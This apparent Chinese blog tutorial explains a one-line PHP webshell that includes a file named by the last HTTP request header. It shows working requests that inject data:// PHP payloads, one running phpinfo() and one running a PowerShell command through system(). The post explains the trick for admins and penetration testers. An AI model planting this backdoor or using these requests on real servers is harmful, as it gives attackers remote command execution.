当前位置：网站首页 > 技术资源 > 正文

一个有意思的PHP Webshell，利用伪协议执行代码

moboyou 2025-06-29 23:34 3 浏览

前不久，在网上看到过一个变形的PHP的webshell，非常有意思，利用的是伪协议来执行代码或命令。

这个PHP的webshell是如何写的呢？代码如下：

<?php
require_once(end(apache_request_headers()));

我来解释一下这段代码的几个函数：

1. apache_request_headers()

作用：获取当前 HTTP 请求的所有请求头（headers），返回一个关联数组，例如：

<PHP>
[
"Host" => "example.com",
"User-Agent" => "Mozilla/5.0",
"Accept" => "text/html",
"X-Malicious-Header" => "evil.php" // 攻击者可控的 header
]

2. end()

作用：返回数组的最后一个元素的值。例如：

<PHP>

$headers = ["Host" => "example.com", "X-Header" => "hack.php"];

echo end($headers); // 输出 "hack.php"

3. require_once()

作用：加载并执行指定的 PHP 文件。如果文件路径可控，攻击者可以包含任意文件（包括远程文件）。

如果实现攻击呢？我们只要在发送包里发送恶意代码就可以了，前提是php.ini里的allow_url_include要打开。

我们发送如下代码就可以了，111.php就是有以上代码的文件了。我们本机用Yakit测试一下：

GET /111.php HTTP/1.1
rce: data://text/plain,<?php phpinfo();?>
Host: 127.0.0.1

执行命令发送如下包就可以了：

GET /111.php HTTP/1.1
rce:data://text/plain,<?php system("powershell -c \"Get-LocalUser\"");?>
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0

如果你网站服务器看到有这样一段代码，就立马删掉吧。如果你是渗透测试人员，如何想更好利用，多学点PHP代码就可以了。

网站管理平台php源码

上一篇：非常实用的15款开源PHP类库
下一篇：Facebook的Parse发布开源PHP脚本，让用户可以直接搭建网站后台

相关推荐

记一次前端逻辑绕过登录到内网挖掘: 前言在测试一个学校网站的时候发现一个未授权访问内网系统，但是这个未授权并不是接口啥的，而是对前端js的审计和调试发现的漏洞，这里给大家分享一下这次的漏洞的过程文章中涉及的敏感信息均已做打码处理，文...

陕西普通话等级查询网的开发者被指将考生数据直接写入源码里: 据报道，陕西普通话等级查询网站突然引起大量程序员关注。有人晒出该网站的源代码的打码截图，图中显示，所有考生数据都被直接写在该网站的源代码里。这表示任何人不需要经过任何验证直接查看源代码即可访问考生信息...

PHP8知识详解:PHP是什么?: PHP是什么？PHP服务网从下面几点为你讲清楚什么是PHP。1、PHP最开始是PersonalHomePage（个人主页）的缩写，已经正式更名为“PHP:HypertextPreproces...

PHP紧急更新修复漏洞:自5.x以来所有版本均受影响: IT之家6月8日消息，PHP项目维护团队昨日发布新补丁，修复了存在于PHPforWindows中的远程代码执行（RCE）漏洞，并敦促用户尽快更新至6月6日发布的8.3.8、...

OA协同办公系统源码解析: 在如今的信息化时代，PHPOA软件承当着为企事业单位提供安全、稳定、开源的信息化安全系统，在当今信息化时代，协同办公系统成为了企业管理的重要工具。OA（OfficeAutomation）协同办公系统...

附源码:PHP实现查询汉字笔画、笔画排序: 有时候我们在开发中可能会用到和汉字有关的方法，例如笔画排序之类的，但是直接进行sort排序往往得不到我们想要的结果，因为内部并没有预留这些排序方法。因此我们需要自己动手，今天就教大家实现汉字笔画的...

StrongShop跨境电商系统源码 | 支持多语言多货币: StrongShop跨境电商系统源码|支持多语言多货币StrongShop是一款免费开源的跨境电商商城网站。基于PHPLaravel框架开发的一款Web商城系统。该项目在没有对Lar...

源代码的定义: 源代码是程序员在开发程序时(通常是在字处理程序中)编写的人类可读指令的列表。源代码通过编译器将其转换为机器代码，也称为目标代码，计算机可以理解和执行。目标代码主要由1和0组成，所以它是不可读的。源代码...

2077年了，PHP语言现在怎么样啦?: “PHP是世界上最好的语言！”这句话一出来，编程界的鄙视链一触即发，程序员的键盘世界大战就爆发了。那么，本文就简单讨论PHP语言，笔者作为创业小公司小团队的角度来妄议一下PHP。首先直接说明观点：新手...

开源直播系统源码—为什么要使用PHP语言: 开展开源直播系统源码的的开发工作的时候，开发人员们碰到的最多问题便是使用什么语言开发的，回答大多是PHP语言。而对于没有的开发经验的人而言，难以理解PHP语言究竟代表着什么，又有哪些作用。实际上，PH...

手游平台源码搭建使用的PHP是什么?有什么优点吗?: PHP即“超文本预处理器”，是在服务器端执行的脚本语言，尤其适用于Web开发并可嵌入html中。PHP结合了C语言、java和perl多个语言的特色发展出自己的特色语法，并依据它们的长项持续改进提升自...

PHP直播源码，直播系统源代码功能有哪些?: PHP直播源码究竟是什么？其实所谓的PHP直播源码就是用PHP语言开发的直播系统源代码。PHP是什么？PHP原始为PersonalHomePage的缩写，已经正式更名为“PHP:Hyperte...

盘点如何利用PHP生成PDF文件: 在PHP代码中生成PDF文件是一项非常耗时的工作，早期的程序员通常是在PHP代码中利用FPDF生成PDF文件。但在如今，有很多的函数库可以使用，借助它们你可以从你提供的HTML文档生成PDF文件，从而...

PHP低代码开发平台 V5.0.7新版发布: 注意：本版变更：此版本增加租户内测模式，同时增加软删除及数据回收功能。Sfdp更新6.0.5版本Tpflow更新6.0.7版本1.[修复]修复数据为空的时桌面方案报错修复了在桌面组件删除时，由于用户...

「sabre/dav」只要十行代码让你的网站获得WebDav网盘能力: 如今网盘已经成为我们日常中很重要的工具了,不仅仅可以和别人分享,更重要的是可以在我们不同的设备之间读取资料.那什么是WebDav呢?WebDav是一个Http上封装的一个文件系统,就像ftp,nfs之...

一周热门

最近发表

首页
收录
顶部